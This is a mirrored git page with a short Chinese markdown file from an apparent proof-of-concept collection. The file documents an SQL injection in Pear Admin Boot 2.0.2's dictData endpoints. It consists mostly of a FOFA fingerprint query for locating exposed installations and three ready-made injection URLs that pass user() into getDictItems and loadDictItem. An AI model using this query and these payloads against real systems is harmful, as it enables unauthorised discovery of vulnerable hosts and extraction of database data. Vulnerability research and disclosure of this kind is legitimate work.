admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Pear Admin Boot/Pear-Admin-Boot存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

21 lines
756 B
Markdown
Raw Blame History

## Pear-Admin-Boot存在SQL注入漏洞
在Pear Admin Boot 2.0.2版本中发现了一个漏洞,并被列为严重漏洞。此问题影响文件/system/dictData/getDictItems/的getDictItems函数。输入,user(),1,1 的操作会导致SQL注入。
## fofa
```
body="明 湖 区 最 具 影 响 力 的 设 计 规 范 之 一"
```
## poc
```
http://localhost:8088/system/dictData/getDictItems/gen_table,user(),1,1
http://localhost:8088/system/dictData/getDictItems/sys_user,user(),1
http://localhost:8088/system/dictData/loadDictItem/sys_user,user(),1?key=1
```
![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406281713539.png)
![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406281713996.png)
Reference in New Issue View Git Blame Copy Permalink